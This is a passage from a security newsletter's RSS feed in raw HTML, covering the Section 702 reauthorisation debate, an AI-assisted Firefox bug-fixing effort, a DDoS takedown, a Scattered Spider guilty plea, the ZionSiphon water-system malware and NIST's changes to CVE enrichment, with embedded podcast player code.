href="https://www.intel.gov/assets/documents/702-documents/702_Booklet-FINAL.pdf"><u>Section 702</u></a> allows US intelligence agencies to compel service providers to help conduct targeted surveillance of foreigners outside the US. It has been described by US officials as the &quot;<a href="https://www.lawfaremedia.org/article/usa-liberty-act-house-judiciarys-proposed-reauthorization-section-702"><u>crown jewel</u></a>&quot; of the country&apos;s surveillance programs.&#xA0;</p><p>Despite that, it has not been without controversy. Collection takes place on US soil and Americans can get caught up in what is known as <a href="https://www.dni.gov/files/FISA_Section_702/Incidental_Collection_Section_702_FISA.pdf"><u>incidental collection</u></a>. Then there was the time that the FBI really screwed up.&#xA0;</p><p>In 2023, <a href="https://news.risky.biz/g-men-gone-wild-65c0eb42a0e6da001a37dfce/"><u>we learnt the Bureau</u></a> had been querying the data almost as a matter of course and with no regard to whether the queries met the government&apos;s pretty sensible criteria. The <a href="https://www.fisc.uscourts.gov/about-foreign-intelligence-surveillance-court"><u>court that oversees FISA</u></a>, and which revealed the FBI&apos;s outrageous behaviour, <a href="https://www.intel.gov/assets/documents/702%20Documents/declassified/21/2021_FISC_Certification_Opinion.pdf"><u>described the Bureau&apos;s use</u></a> of Section 702 data as a &quot;pattern of broad, suspicionless queries that are not reasonably likely to retrieve foreign intelligence or evidence of a crime&quot;.&#xA0;</p><p>Despite Congress knowing about the FBI&apos;s egregious practices, the Bureau pinky-promised that it would fix its ways and Section 702 <a href="https://www.congress.gov/crs_external_products/R/PDF/R48592/R48592.1.pdf"><u>was reauthorised</u></a> in April 2024, for just two years. To its credit, the FBI&apos;s querying compliance <em>has</em> improved. The Section 702 compliance assessment <a href="https://www.intel.gov/ic-on-the-record-database/declassified/odni-releases-29th-joint-assessment-of-section-702-compliance"><u>released in July last year</u></a> found a 99% compliance rate.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>One nice side-effect of frequent renewals is that the intelligence community releases Section 702 success stories to justify the capability. This time around, <a href="https://www.intelligence.gov/assets/documents/702-documents/CIA_FISA_Factsheet_FINAL_20260327.pdf"><u>they include</u></a> preventing a mass casualty event at a Taylor Swift concert, providing support to a raid that resulted in the death of Mexican drug kingpin El Mencho, and the disruption of fentanyl production.&#xA0;</p><p>Despite the FBI improving its compliance and the intelligence proving valuable, the authorisation was <a href="https://www.politico.com/news/2026/04/17/spy-powers-expiration-closes-in-as-house-procedural-vote-fails-00878317"><u>extended</u></a> by a mere ten days. It was originally set to expire on Monday, the new date is Thursday, April 30th. President Trump had been pushing for a &quot;clean&quot; 18-month extension, meaning one without any additional reforms. But that was kyboshed by <a href="https://www.politico.com/news/2026/04/16/fisa-extension-trump-republicans-00878199"><u>significant Republican pushback</u></a>.</p><p>Republican Representative Thomas Massie <a href="https://x.com/RepThomasMassie/status/2044831945431843086"><u>posted on X</u></a> that he&apos;d seen Top Secret FISA documents that raised &quot;serious concerns about FBI implementation of FISA 702&quot;. He also mentioned a &quot;letter by Senator Wyden describing a secret government interpretation of FISA law&quot;.</p><p>This skepticism isn&apos;t helped by the Trump administration <a href="https://en.wikipedia.org/wiki/2025_dismissals_of_U.S._inspectors_general"><u>not exactly being keen</u></a> on <a href="https://www.washingtonpost.com/politics/2026/03/19/inspector-general-independence-trump/"><u>strong independent oversight</u></a>. In May last year FBI Director Kash Patel <a href="https://www.nytimes.com/2025/05/20/us/politics/fbi-kash-patel-office-internal-auditing.html"><u>shut the Office of Internal Auditing</u></a>, a watchdog unit that was focussed on Section 702 compliance. The office&apos;s functions were subsumed within a larger division, but the closure makes it very difficult to argue that the FBI is laser-focussed on compliance.</p><p>So some of the difficulty reauthorising Section 702 clearly comes down to a simple lack of trust in the administration.&#xA0;&#xA0;</p><p>Ending Section 702 collection would be bad news, but the right reforms would be welcome. The Security and Freedom Enhancement&#xA0; or SAFE Act is <a href="https://www.protectprivacynow.org/news/sens-mike-lee-and-dick-durbin-reintroduce-the-safe-act-to-require-warrants-before-the-government-can-help-itself-to-americans-communications"><u>bipartisan legislation</u></a> proposed by Senators Mike Lee (R-UT) and Dick Durbin (D-IL), and it has some good elements. These include mandatory FBI audits as well as a provision to prevent domestic law enforcement and intelligence agencies from buying the sensitive data of Americans from brokers.&#xA0;</p><p>To be clear, buying data from brokers has <em>nothing at all</em> to do with Section 702 collection. In an ideal world each issue would be individually examined on its own merits. But you only have to glance at the news to know we do not live in an ideal world, so we&#x2019;re okay with it being incorporated into a reauthorisation bill.&#xA0;&#xA0;&#xA0;</p><p>We do, however, think the bill&apos;s requirement that <em>all </em>agencies get a warrant to access content from US persons is a bit too all-encompassing. That <em>could </em>make sense for the FBI, because its domestic powers means warrants would protect American civil liberties. Overseas focussed agencies like NSA, however, don&apos;t have domestic powers and have well-oiled standard procedures to protect the privacy of Americans when they come across them in incidental collection.&#xA0;</p><p>All in all, the renewal process is a mess. There will be some horse trading before the reauthorisation progresses. We just hope what we wind up with in the end isn&apos;t a step backwards.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/lR6-aRynHes?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Musk snubs French authorities"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Firefox finds bugs with AI:</strong>&#xA0; Mozilla has published <a href="https://blog.mozilla.org/en/privacy-security/ai-security-zero-day-vulnerabilities/"><u>a remarkably upbeat post</u></a> about how it has used AI vulnerability scanning to make Firefox more secure. This week&apos;s release fixes 271 vulnerabilities identified by Claude&apos;s Mythos Preview model. The author, Firefox&apos;s CTO Bobby Holley, says that being able to find vulnerabilities relatively cheaply means that &quot;defenders finally have a chance to win, decisively&quot;.&#xA0;</li><li><strong>Multinational operation disrupts DDoS services:</strong> <a href="https://www.europol.europa.eu/media-press/newsroom/news/europol-supported-global-operation-targets-over-75-000-users-engaged-in-ddos-attacks"><u>Europol announced</u></a> that authorities from 21 countries took coordinated action to arrest 4 individuals and takedown 53 domains used in DDoS-for-hire services. The authorities also sent 75,000 emails to customers of the services warning them to knock it off.&#xA0;&#xA0;</li><li><strong>Influential Scattered Spider hacker pleads guilty:</strong> British national Tyler Robert Buchanan, known online as Tylerb, <a href="https://www.justice.gov/usao-cdca/pr/british-national-pleads-guilty-hacking-companies-and-stealing-least-8-million-virtual"><u>has pleaded guilty</u></a> to crimes related to his membership of the Scattered Spider cybercrime group. Buchanan was involved in a series of phishing attacks that helped the group hack major technology companies and steal tens of millions of dollars worth of cryptocurrency. <em>Krebs on Security</em> has <a href="https://krebsonsecurity.com/2026/04/scattered-spider-member-tylerb-pleads-guilty/"><u>more coverage</u></a>, including the wild story that a rival gang hired thugs to break into Buchanan&apos;s home and threaten to burn him with a blowtorch.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Catalin Cimpanu talks with Sydney Marrone, Head of Threat Hunting at Nebulock, about hunting shadow AI agents on corporate networks.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI124.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI124/&quot;&gt;Sponsored: Nebulock on hunting shadow AI&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 9:45 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Nebulock on hunting shadow AI&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> take a deep dive into how a single hacker used OpenAI and Anthropic&#x2019;s tools to help hack nine Mexican government organisations in quick time.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN163.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN163/&quot;&gt;Between Two Nerds: AI as the mythical 10x hacker&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 33:09 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: AI as the mythical 10x hacker&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/xCuV8iep9mg?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: AI as the mythical 10x hacker"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Former FBI official calls for terrorism designations for ransomware groups that target hospitals and critical infrastructure:</strong> A former FBI cyber official has urged Congress to investigate if ransomware groups that target hospitals and critical infrastructure can be designated as terrorist organizations.</p><p>Former FBI Cyber Deputy Director <a href="https://www.linkedin.com/in/cynthia-kaiser-cyber/"><u>Cynthia Kaiser</u></a> says the designation would allow prosecutors access to a broader set of tools and legal levers in tracking and taking down operations.</p><p>Kaiser, who served in the FBI for 20 years, including as the agency&apos;s Cyber Deputy Director, has also urged lawmakers to examine if ransomware operators can be charged with murder or manslaughter if any attacks lead to a human death.</p><p>[<a href="https://news.risky.biz/risky-bulletin-former-fbi-official-calls-for-terrorism-designations-for-ransomware-groups-that-target-hospitals-and-critical-infrastructure/"><u>more</u></a> on<em> Risky Bulletin</em>]</p><p><strong>New malware tries to sabotage Israel&apos;s water system but fails because it&apos;s buggy: </strong>Security researchers at British security firm Darktrace have found a new and interesting piece of malware that was specifically designed to infect and sabotage the operations of Israel&apos;s national water management network.</p><p>Named <a href="https://www.darktrace.com/blog/inside-zionsiphon-darktraces-analysis-of-ot-malware-targeting-israeli-water-systems"><u>ZionSiphon</u></a>, the malware is one of the rare malware strains created to target operational technology (OT), which are the type of networks from which staff manage industrial equipment.</p><p>The malware is a very targeted operation that only works inside networks hosted on Israeli IP address ranges and where the malware finds specific text strings containing the names of common Israeli companies that manage water treatment and desalination systems.</p><p>[<a href="https://news.risky.biz/tries-to-sabotage-israels-water-system-but-fails-because-its-buggy/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>NIST gives up enriching most CVEs:</strong> The US National Institute of Standards and Technology announced on Wednesday a new policy regarding the US National Vulnerability Database, which the agency has been struggling to keep updated with details for every new vulnerability added to the system.</p><p>Going forward, <a href="https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth"><u>NIST says</u></a> its staff will only add data&#x2014;in a process called enrichment&#x2014;only for important vulnerabilities.</p><p>This will include three types of security flaws, which the agency says are critical to the safe operation of US government networks and its private sector.</p><ul><li>CVE entries for vulnerabilities listed in CISA KEV, a database of actively exploited bugs;</li><li>CVEs in software known to be used by US federal agencies;</li><li>and CVEs in what the agency classifies as &quot;critical software.&quot;</li></ul><p>[<a href="https://news.risky.biz/risky-bulletin-nist-gives-up-enriching-most-cves/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  113. Srsly Risky Biz: It Is Time to Ban Sale of Precise Geolocation

    Thu, 16 Apr 2026 05:03:57 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://corelight.com/"><em><u>Corelight</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash-1.jpg" alt="Srsly Risky Biz: It Is Time to Ban Sale of Precise Geolocation"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://corelight.com/"><em><u>Corelight</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div 